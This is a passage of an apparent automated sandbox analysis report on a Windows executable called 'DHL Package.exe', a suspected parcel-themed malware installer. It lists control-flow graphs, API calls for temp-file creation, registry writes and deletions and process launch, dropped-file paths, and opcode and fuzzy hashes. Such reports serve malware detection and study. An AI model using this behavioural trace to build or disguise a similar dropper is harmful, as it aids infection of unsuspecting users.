                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                • API String ID: 2200240437-1946221925
                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                • Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                • Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 702 40324c-403263 703 403265 702->703 704 40326c-403274 702->704 703->704 705 403276 704->705 706 40327b-403280 704->706 705->706 707 403290-40329d call 403431 706->707 708 403282-40328b call 403447 706->708 712 4032a3-4032a7 707->712 713 4033e8 707->713 708->707 715 4033d1-4033d3 712->715 716 4032ad-4032cd GetTickCount call 40692b 712->716 714 4033ea-4033eb 713->714 717 40342a-40342e 714->717 718 4033d5-4033d8 715->718 719 40341c-403420 715->719 726 403427 716->726 727 4032d3-4032db 716->727 722 4033da 718->722 723 4033dd-4033e6 call 403431 718->723 724 403422 719->724 725 4033ed-4033f3 719->725 722->723 723->713 735 403424 723->735 724->726 729 4033f5 725->729 730 4033f8-403406 call 403431 725->730 726->717 731 4032e0-4032ee call 403431 727->731 732 4032dd 727->732 729->730 730->713 739 403408-403414 call 405f83 730->739 731->713 740 4032f4-4032fd 731->740 732->731 735->726 745 403416-403419 739->745 746 4033cd-4033cf 739->746 742 403303-403320 call 40694b 740->742 748 403326-40333d GetTickCount 742->748 749 4033c9-4033cb 742->749 745->719 746->714 750 403388-40338a 748->750 751 40333f-403347 748->751 749->714 752 40338c-403390 750->752 753 4033bd-4033c1 750->753 754 403349-40334d 751->754 755 40334f-403380 MulDiv wsprintfW call 405443 751->755 756 403392-403397 call 405f83 752->756 757 4033a5-4033ab 752->757 753->727 758 4033c7 753->758 754->750 754->755 762 403385 755->762 763 40339c-40339e 756->763 761 4033b1-4033b5 757->761 758->726 761->742 764 4033bb 761->764 762->750 763->746 765 4033a0-4033a3 763->765 764->726 765->761
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountTick$wsprintf
                                                                                                • String ID: ... %d%%
                                                                                                • API String ID: 551687249-2449383134
                                                                                                • Opcode ID: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
                                                                                                • Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
                                                                                                • Opcode Fuzzy Hash: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
                                                                                                • Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 766 405f00-405f0c 767 405f0d-405f41 GetTickCount GetTempFileNameW 766->767 768 405f50-405f52 767->768 769 405f43-405f45 767->769 771 405f4a-405f4d 768->771 769->767 770 405f47 769->770 770->771
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405F1E
                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL Package.exe",0040348D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9), ref: 00405F39
                                                                                                Strings
                                                                                                • "C:\Users\user\Desktop\DHL Package.exe", xrefs: 00405F00
                                                                                                • nsa, xrefs: 00405F0D
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F05
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: "C:\Users\user\Desktop\DHL Package.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-2447530259
                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                • Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                • Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 772 402e41-402e6a call 406248 774 402e6f-402e73 772->774 775 402f24-402f28 774->775 776 402e79-402e7d 774->776 777 402ea2-402eb5 776->777 778 402e7f-402ea0 RegEnumValueW 776->778 780 402ede-402ee5 RegEnumKeyW 777->780 778->777 779 402f09-402f17 RegCloseKey 778->779 779->775 781 402eb7-402eb9 780->781 782 402ee7-402ef9 RegCloseKey call 4067d0 780->782 781->779 783 402ebb-402ecf call 402e41 781->783 788 402f19-402f1f 782->788 789 402efb-402f07 RegDeleteKeyW 782->789 783->782 790 402ed1-402edd 783->790 788->775 789->775 790->780
                                                                                                APIs
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                • String ID:
                                                                                                • API String ID: 1354259210-0
                                                                                                • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                • Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
                                                                                                • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                • Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA71B5F: GlobalFree.KERNEL32(?), ref: 6CA71DD4
                                                                                                  • Part of subcall function 6CA71B5F: GlobalFree.KERNEL32(?), ref: 6CA71DD9
                                                                                                  • Part of subcall function 6CA71B5F: GlobalFree.KERNEL32(?), ref: 6CA71DDE
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA71825
                                                                                                • FreeLibrary.KERNEL32(?), ref: 6CA718AB
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA718D0
                                                                                                  • Part of subcall function 6CA7239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6CA723CF
                                                                                                  • Part of subcall function 6CA72770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6CA717F6,00000000), ref: 6CA72840
                                                                                                  • Part of subcall function 6CA715C6: wsprintfW.USER32 ref: 6CA715F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3962662361-3916222277
                                                                                                • Opcode ID: 7babacb5cad028c59e2170eb4e76f12d389f3852e1fefe4c1ec5af779579d78f
                                                                                                • Instruction ID: 66553681895c7755e059aee1c52183c4618e252652bdd0ccbe20e3d1f7ada5ab
                                                                                                • Opcode Fuzzy Hash: 7babacb5cad028c59e2170eb4e76f12d389f3852e1fefe4c1ec5af779579d78f
                                                                                                • Instruction Fuzzy Hash: 7041E4795003059ADF348F7499ACBE537E8BB05319F184675EA1D9AA82DB78C0CD87B0
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000023,00000011,00000002), ref: 004024CD
                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000000,00000011,00000002), ref: 0040250D
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseValuelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp
                                                                                                • API String ID: 2655323295-2066866256
                                                                                                • Opcode ID: 719a10b40097e7594d3a00bce5270b52fea52596e69aedda1ab21f77c9f23a5e
                                                                                                • Instruction ID: 5961cf0302e183f44fe6dca2e080a575d9ce570cefe28a5469520932bfc38106
                                                                                                • Opcode Fuzzy Hash: 719a10b40097e7594d3a00bce5270b52fea52596e69aedda1ab21f77c9f23a5e
                                                                                                • Instruction Fuzzy Hash: D711AF71E00108BEDB10AFA5DE49AAE7BB9EF44314F21443AF504B71D1D6B88D419668
                                                                                                APIs
                                                                                                  • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
                                                                                                  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
                                                                                                  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                  • Part of subcall function 00405912: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\peggle\Dilettantkomediers,?,00000000,000000F0), ref: 0040164D
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\peggle\Dilettantkomediers, xrefs: 00401640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                • String ID: C:\Users\user\AppData\Local\peggle\Dilettantkomediers
                                                                                                • API String ID: 1892508949-4134240001
                                                                                                • Opcode ID: 0a8316340f92e831056d46a796daf77011545e4f9da01359f8b8fa5e627cb0d4
                                                                                                • Instruction ID: 4b740b80641ba3a3eb8a8ec9adfde8f0bc1f07408697dd7e04d4643b588e1c06
                                                                                                • Opcode Fuzzy Hash: 0a8316340f92e831056d46a796daf77011545e4f9da01359f8b8fa5e627cb0d4
                                                                                                • Instruction Fuzzy Hash: 1411E231504114EBCF206FA5CD4199F37B0EF24328B28493BE912B12F1D63E49829B6E
                                                                                                APIs
                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,00406538,80000002), ref: 004062EF
                                                                                                • RegCloseKey.KERNELBASE(?,?,00406538,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004062FA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseQueryValue
                                                                                                • String ID: Call
                                                                                                • API String ID: 3356406503-1824292864
                                                                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                • Instruction ID: ae085d710551058a7f2532bbeea434883cb59e3c9f2bcee9d1549068d4bd9198
                                                                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                • Instruction Fuzzy Hash: B9015A72500209EADF218F51CC09EDB3BA8EF95364F01803AFD1AA6190D738D968DFA4
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                                                • CloseHandle.KERNEL32(?), ref: 004059FA
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 004059D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                • Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
                                                                                                • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                • Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                                                • Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
                                                                                                • Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                                                • Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                                                • Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
                                                                                                • Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                                                • Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                                                • Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
                                                                                                • Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
